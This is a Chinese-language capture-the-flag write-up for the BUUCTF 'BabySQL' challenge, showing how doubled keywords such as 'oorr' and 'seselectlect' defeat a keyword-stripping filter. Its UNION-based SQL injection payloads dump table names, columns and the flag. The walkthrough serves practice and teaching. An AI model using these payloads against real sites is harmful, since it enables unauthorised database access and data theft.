[极客大挑战 2019]BabySQL 1(BUCTF在线评测)

[极客大挑战 2019]BabySQL 1(BUCTF在线评测)_第1张图片

 打开靶机,一样的sql发现不行了

 一样的sql注入不行了,感觉or 关键字给弄没了

[极客大挑战 2019]BabySQL 1(BUCTF在线评测)_第2张图片

 浏览器F12,编辑请求这样比较好看(POST请求参数比较好看)

[极客大挑战 2019]BabySQL 1(BUCTF在线评测)_第3张图片 修改如下 

'o/**/r true#

发现中间的都没了 

[极客大挑战 2019]BabySQL 1(BUCTF在线评测)_第4张图片

使用下面继续注入 

'oorr true#

发现成功了,系统可能就新增了一些sql关键字的过滤 

[极客大挑战 2019]BabySQL 1(BUCTF在线评测)_第5张图片

开始查询表 

'oorr true union select group_concat(table_name) from information_schema.tables where table_schema = database()#

 发现select from一些关键字没了[极客大挑战 2019]BabySQL 1(BUCTF在线评测)_第6张图片

注意注入 or select where union from 等关键字都给过滤了 

'oorr false uunionnion seselectlect 1,group_concat(table_name) ,2 frfromom infoorrmation_schema.tables whewherere table_schema=database()#

得到表名b4bsql,geekuser

[极客大挑战 2019]BabySQL 1(BUCTF在线评测)_第7张图片

 查询表字段

'oorr false uunionnion seselectlect 1,group_concat(column_name),2 frfromom infoorrmation_schema.columns whewherere table_name='b4bsql'#

 得到 id,username,password

[极客大挑战 2019]BabySQL 1(BUCTF在线评测)_第8张图片

 查询该表信息,注意or给替换的 password里面也有or

'oorr false uunionnion seselectlect  id,username,passwoorrd ffromrom b4bsql limit 7,100#

得到flag{ca17b523-fe92-4451-943d-3f832154b748}

[极客大挑战 2019]BabySQL 1(BUCTF在线评测)_第9张图片

 提交flag

 [极客大挑战 2019]BabySQL 1(BUCTF在线评测)_第10张图片

你可能感兴趣的:(学习,java,数据库,sql)